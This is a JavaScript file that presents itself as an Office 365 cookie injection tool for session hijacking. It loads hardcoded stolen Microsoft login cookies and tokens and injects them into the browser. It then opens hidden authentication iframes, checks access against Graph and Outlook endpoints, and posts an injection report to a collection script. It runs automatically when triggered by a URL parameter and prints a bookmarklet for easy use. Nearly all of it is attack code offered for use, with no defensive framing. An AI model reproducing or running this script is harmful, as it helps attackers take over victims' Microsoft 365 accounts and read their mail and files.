/**
 * Enhanced Microsoft Office 365 Cookie Injection Script
 * Advanced session hijacking and authentication bypass
 */

class Office365CookieInjector {
    constructor() {
        this.targetDomains = [
            'login.microsoftonline.com',
            'account.microsoft.com',
            'office.com',
            'outlook.com',
            'live.com',
            'graph.microsoft.com'
        ];
        
        this.stolenCookies = [];
        this.injectionResults = [];
        this.debugMode = true;
        
        this.init();
    }
    
    init() {
        this.log('🚀 Office365 Cookie Injector initialized');
        
        // Load stolen cookies (replace with actual stolen data)
        this.loadStolenCookies();
        
        // Check current domain and redirect if needed
        if (!this.isValidDomain()) {
            this.redirectToMicrosoft();
            return;
        }
        
        // Start injection process
        this.startInjection();
    }
    
    loadStolenCookies() {
        // This would be populated with actual stolen cookies
        this.stolenCookies = [
            {
                name: "ESTSAUTHPERSISTENT",
                value: "1.APP.ASwAobYrMabNoEW8SuFAjAXkXFtEZUfGMrBJg-Ydk3ZSdsr2ACssAA.AgABFwQAAABVrSpeuWamRam2jAF1XRQEAwDs_wUA9P_0AkAbmAqciVYVcmxwzy42CeeMN_VUNm2mu566dD9b2EfYhlZ0Bb-2MO8pYMhDXCZKB6bTUF4Y4djve5iHK-xJBp6CtsoCB0UrRUJDpo-EMIJHf0WVkIf_qUNOFHF7Vc-IUn_WSqoYzz5c99xOiLUjpr8bXltIwVYOe0yCLDF1PoGze6IkVr6x4jyAGtFILS96_4wH0N4P3VYtOfxnM1EcbYqV_XdnkzgJg6ozgRjT2x_kYPMbYlEW0SWUepPcfy0BObhtYDHa6vDTEiA9EZa3AFX6x_cQtbdQarABCVAgFJNtMEdCET8f1dhQ23LItsw_sbuPPmMihErFaAjKRLZbrMaaCaWJeuRpInHEBaaq3R6XZIrHe1kEJHomxM8OzgNc5g4ZSk45jMUcFs332XLDmEG9BeHEgvDpwh9Xn__w-dz3f2YJBpGlJm8Ild44Rc53DHNkV9k3b5lpXF2Bi_QyIYVGytHk1C-lMtN2Q0aouaCZcBFtolCtemRaC4G22tGI8ztbhlTZIeBTCXq0gNj-TuZGwJjU_fKTvVLeW5BOkD38CJMzndpzSummMDH3UW63j1p4wjxjQ1suEYOCHAe_ybwoXQCAaS8Q3K4PF0hO_nD26cazXQMCBGRIUA05nXj_",
                domain: ".login.microsoftonline.com",
                path: "/",
                secure: true,
                httpOnly: false,
                sameSite: "None",
                expires: new Date(Date.now() + 86400000).toUTCString()
            },
            {
                name: "ESTSAUTH",
                value: "1.APP.ASwAobYrMabNoEW8SuFAjAXkXFtEZUfGMrBJg-Ydk3ZSdsr2ACssAA.AgABFwQAAABVrSpeuWamRam2jAF1XRQEAwDs_wUA9P-ezbfbWOXhJnBob0TQzn9jqaMLd6srR2Hz_RP9_CcpXXm4zywWkM1ofKPMmWIesdQeU9PgN_XyKw",
                domain: ".login.microsoftonline.com",
                path: "/",
                secure: true,
                httpOnly: false,
                sameSite: "None",
                expires: new Date(Date.now() + 86400000).toUTCString()
            },
            {
                name: "ESTSAUTHLIGHT",
                value: "+d7bb42f2-7d54-4d1c-a439-767ee08a01d9",
                domain: ".login.microsoftonline.com",
                path: "/",
                secure: true,
                httpOnly: false,
                sameSite: "None",
                expires: new Date(Date.now() + 86400000).toUTCString()
            },
            {
                name: "SignInStateCookie",
                value: "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSJ9",
                domain: ".login.microsoftonline.com",
                path: "/",
                secure: true,
                httpOnly: false,
                sameSite: "None"
            },
            {
                name: "buid",
                value: "0.ASwAobYrMabNoEW8SuFAjAXkXFtEZUfGMrBJg-Ydk3ZSdsr2ACssAA",
                domain: ".login.microsoftonline.com",
                path: "/",
                secure: true,
                httpOnly: false,
                sameSite: "Lax"
            },
            {
                name: "MSPOK",
                value: "$uuid-a1b2c3d4-e5f6-7890-abcd-ef1234567890",
                domain: ".login.microsoftonline.com",
                path: "/",
                secure: true,
                httpOnly: false,
                sameSite: "None"
            }
        ];
        
        this.log(`📦 Loaded ${this.stolenCookies.length} stolen cookies`);
    }
    
    isValidDomain() {
        const currentDomain = window.location.hostname.toLowerCase();
        return this.targetDomains.some(domain => currentDomain.includes(domain));
    }
    
    redirectToMicrosoft() {
        this.log('🔄 Redirecting to Microsoft login page...');
        
        const redirectUrls = [
            'https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties',
            'https://account.microsoft.com/auth/complete-signin',
            'https://login.live.com/oauth20_authorize.srf?client_id=4345a7b9-9a63-4910-a426-35363201d503'
        ];
        
        // Use random redirect URL
        const randomUrl = redirectUrls[Math.floor(Math.random() * redirectUrls.length)];
        
        setTimeout(() => {
            window.location.href = randomUrl;
        }, 1000);
    }
    
    async startInjection() {
        this.log('💉 Starting cookie injection process...');
        
        try {
            // Step 1: Clear existing cookies
            await this.clearExistingCookies();
            
            // Step 2: Inject stolen cookies
            await this.injectCookies();
            
            // Step 3: Inject localStorage data
            await this.injectLocalStorage();
            
            // Step 4: Inject sessionStorage data
            await this.injectSessionStorage();
            
            // Step 5: Create authentication iframes
            await this.createAuthIframes();
            
            // Step 6: Verify authentication
            await this.verifyAuthentication();
            
            // Step 7: Redirect to target
            await this.redirectToTarget();
            
        } catch (error) {
            this.log('❌ Injection failed:', error);
        }
    }
    
    async clearExistingCookies() {
        this.log('🧹 Clearing existing cookies...');
        
        // Get all existing cookies
        const existingCookies = document.cookie.split(';');
        
        for (let cookie of existingCookies) {
            const cookieName = cookie.split('=')[0].trim();
            
            // Clear cookie by setting it to expire
            document.cookie = `${cookieName}=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/; domain=${window.location.hostname}`;
            document.cookie = `${cookieName}=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/; domain=.${window.location.hostname}`;
        }
        
        this.log('✅ Existing cookies cleared');
    }
    
    async injectCookies() {
        this.log('🍪 Injecting stolen cookies...');
        
        let successCount = 0;
        
        for (const cookie of this.stolenCookies) {
            try {
                let cookieString = `${cookie.name}=${cookie.value}`;
                
                if (cookie.domain) cookieString += `; domain=${cookie.domain}`;
                if (cookie.path) cookieString += `; path=${cookie.path}`;
                if (cookie.expires) cookieString += `; expires=${cookie.expires}`;
                if (cookie.secure) cookieString += `; secure`;
                if (cookie.sameSite) cookieString += `; SameSite=${cookie.sameSite}`;
                
                document.cookie = cookieString;
                
                // Verify cookie was set
                if (this.getCookie(cookie.name)) {
                    this.log(`✅ Injected: ${cookie.name}`);
                    successCount++;
                    this.injectionResults.push({
                        name: cookie.name,
                        status: 'success',
                        timestamp: new Date().toISOString()
                    });
                } else {
                    this.log(`❌ Failed to inject: ${cookie.name}`);
                    this.injectionResults.push({
                        name: cookie.name,
                        status: 'failed',
                        timestamp: new Date().toISOString()
                    });
                }
                
            } catch (error) {
                this.log(`❌ Error injecting ${cookie.name}:`, error);
                this.injectionResults.push({
                    name: cookie.name,
                    status: 'error',
                    error: error.message,
                    timestamp: new Date().toISOString()
                });
            }
        }
        
        this.log(`🎯 Successfully injected ${successCount}/${this.stolenCookies.length} cookies`);
    }
    
    async injectLocalStorage() {
        this.log('💾 Injecting localStorage data...');
        
        const localStorageData = {
            'msal.idtoken': 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSJ9.eyJhdWQiOiI0MzQ1YTdiOS05YTYzLTQ5MTAtYTQyNi0zNTM2MzIwMWQ1MDMiLCJpc3MiOiJodHRwczovL2xvZ2luLm1pY3Jvc29mdG9ubGluZS5jb20vdGVuYW50aWQvdjIuMCIsImlhdCI6MTY5NzI4MDAwMCwibmJmIjoxNjk3MjgwMDAwLCJleHAiOjE2OTcyODM2MDAsImFpbyI6IkFTUUEyLzhVQUFBQSIsImF6cCI6IjQzNDVhN2I5LTlhNjMtNDkxMC1hNDI2LTM1MzYzMjAxZDUwMyIsImF6cGFjciI6IjAiLCJuYW1lIjoiVGVzdCBVc2VyIiwib2lkIjoiMTIzNDU2NzgtOWFiYy1kZWYwLTEyMzQtNTY3ODkwYWJjZGVmIiwicHJlZmVycmVkX3VzZXJuYW1lIjoidGVzdEB0ZXN0LmNvbSIsInJoIjoiMC5BU3dBb2JZck1hYk5vRVc4U3VGQWpBWGtYRnRFWlVmR01yQkpnLVlkazNaU2RzcjJBQ3NzQUEuIiwic3ViIjoiMTIzNDU2NzgtOWFiYy1kZWYwLTEyMzQtNTY3ODkwYWJjZGVmIiwidGlkIjoiYTFiMmMzZDQtZTVmNi03ODkwLWFiY2QtZWYxMjM0NTY3ODkwIiwidXRpIjoiYWJjZGVmZ2hpams0NTY3ODkwIiwidmVyIjoiMi4wIn0',
            'msal.client.info': '{"uid":"12345678-9abc-def0-1234-567890abcdef","utid":"a1b2c3d4-e5f6-7890-abcd-ef123456789"}',
            'msal.account.keys': '["12345678-9abc-def0-1234-567890abcdef.a1b2c3d4-e5f6-7890-abcd-ef123456789-login.microsoftonline.com-idtoken"]',
            'msal.token.keys.4345a7b9-9a63-4910-a426-35363201d503': '["accesstoken-4345a7b9-9a63-4910-a426-35363201d503-a1b2c3d4-e5f6-7890-abcd-ef123456789-https://graph.microsoft.com/.default"]',
            'office365.user.profile': JSON.stringify({
                displayName: "Test User",
                mail: "test@test.com",
                userPrincipalName: "test@test.com",
                id: "12345678-9abc-def0-1234-567890abcdef"
            })
        };
        
        let injectedCount = 0;
        
        for (const [key, value] of Object.entries(localStorageData)) {
            try {
                localStorage.setItem(key, value);
                this.log(`✅ localStorage: ${key}`);
                injectedCount++;
            } catch (error) {
                this.log(`❌ Failed localStorage: ${key}`, error);
            }
        }
        
        this.log(`💾 Injected ${injectedCount} localStorage items`);
    }
    
    async injectSessionStorage() {
        this.log('🔄 Injecting sessionStorage data...');
        
        const sessionStorageData = {
            'office365.session.id': 'sess_' + Math.random().toString(36).substr(2, 9),
            'office365.auth.state': 'authenticated',
            'office365.last.activity': Date.now().toString()
        };
        
        let injectedCount = 0;
        
        for (const [key, value] of Object.entries(sessionStorageData)) {
            try {
                sessionStorage.setItem(key, value);
                this.log(`✅ sessionStorage: ${key}`);
                injectedCount++;
            } catch (error) {
                this.log(`❌ Failed sessionStorage: ${key}`, error);
            }
        }
        
        this.log(`🔄 Injected ${injectedCount} sessionStorage items`);
    }
    
    async createAuthIframes() {
        this.log('🖼️ Creating authentication iframes...');
        
        const iframeUrls = [
            'https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties&prompt=none',
            'https://account.microsoft.com/auth/complete-signin?prompt=none',
            'https://graph.microsoft.com/v1.0/me'
        ];
        
        for (let i = 0; i < iframeUrls.length; i++) {
            try {
                const iframe = document.createElement('iframe');
                iframe.style.display = 'none';
                iframe.style.width = '1px';
                iframe.style.height = '1px';
                iframe.src = iframeUrls[i];
                iframe.id = `auth-iframe-${i}`;
                
                document.body.appendChild(iframe);
                this.log(`✅ Created iframe: ${iframe.id}`);
                
                // Remove iframe after 5 seconds
                setTimeout(() => {
                    if (document.getElementById(iframe.id)) {
                        document.body.removeChild(iframe);
                    }
                }, 5000);
                
            } catch (error) {
                this.log(`❌ Failed to create iframe:`, error);
            }
        }
    }
    
    async verifyAuthentication() {
        this.log('🔍 Verifying authentication...');
        
        const verificationEndpoints = [
            'https://graph.microsoft.com/v1.0/me',
            'https://outlook.office365.com/api/v2.0/me',
            'https://www.office.com/api/v1.0/me'
        ];
        
        for (const endpoint of verificationEndpoints) {
            try {
                const response = await fetch(endpoint, {
                    method: 'GET',
                    credentials: 'include',
                    headers: {
                        'Accept': 'application/json',
                        'Authorization': 'Bearer ' + (localStorage.getItem('msal.idtoken') || '')
                    }
                });
                
                if (response.ok) {
                    const data = await response.json();
                    this.log(`✅ Authentication verified via ${endpoint}`);
                    this.log('👤 User data:', data);
                    return true;
                } else {
                    this.log(`❌ Authentication failed at ${endpoint}: ${response.status}`);
                }
                
            } catch (error) {
                this.log(`❌ Verification error at ${endpoint}:`, error);
            }
        }
        
        this.log('⚠️ Authentication verification inconclusive');
        return false;
    }
    
    async redirectToTarget() {
        this.log('🎯 Redirecting to target application...');
        
        const targetUrls = [
            'https://www.office.com/',
            'https://outlook.office365.com/',
            'https://teams.microsoft.com/',
            'https://onedrive.live.com/',
            'https://portal.azure.com/'
        ];
        
        // Choose random target or use specified one
        const targetUrl = targetUrls[0]; // Default to Office.com
        
        this.log(`🚀 Redirecting to: ${targetUrl}`);
        
        // Send injection report before redirect
        await this.sendInjectionReport();
        
        setTimeout(() => {
            window.location.href = targetUrl;
        }, 2000);
    }
    
    async sendInjectionReport() {
        this.log('📊 Sending injection report...');
        
        const report = {
            timestamp: new Date().toISOString(),
            domain: window.location.hostname,
            url: window.location.href,
            userAgent: navigator.userAgent,
            injectionResults: this.injectionResults,
            cookiesInjected: this.injectionResults.filter(r => r.status === 'success').length,
            totalCookies: this.stolenCookies.length,
            success: this.injectionResults.filter(r => r.status === 'success').length > 0
        };
        
        try {
            // Send to collection endpoint (replace with actual endpoint)
            const response = await fetch('/cookie_handler.php', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    action: 'injection_report',
                    report: report
                })
            });
            
            if (response.ok) {
                this.log('✅ Injection report sent successfully');
            } else {
                this.log('❌ Failed to send injection report');
            }
            
        } catch (error) {
            this.log('❌ Error sending injection report:', error);
        }
    }
    
    // Utility functions
    getCookie(name) {
        const value = `; ${document.cookie}`;
        const parts = value.split(`; ${name}=`);
        if (parts.length === 2) return parts.pop().split(';').shift();
        return null;
    }
    
    log(...args) {
        if (this.debugMode) {
            console.log('[Office365Injector]', ...args);
        }
    }
    
    // Create bookmarklet
    static createBookmarklet() {
        const script = `
            (function() {
                const injector = new Office365CookieInjector();
            })();
        `;
        
        return 'javascript:' + encodeURIComponent(script.replace(/\s+/g, ' ').trim());
    }
}

// Auto-execute if loaded directly
if (typeof window !== 'undefined') {
    // Check if we should auto-execute
    const autoExecute = new URLSearchParams(window.location.search).get('auto') === 'true';
    
    if (autoExecute || window.location.hash === '#inject') {
        new Office365CookieInjector();
    }
    
    // Make available globally for manual execution
    window.Office365CookieInjector = Office365CookieInjector;
    
    // Output bookmarklet to console
    console.log('📎 Bookmarklet:', Office365CookieInjector.createBookmarklet());
}

// Export for Node.js if needed
if (typeof module !== 'undefined' && module.exports) {
    module.exports = Office365CookieInjector;
}
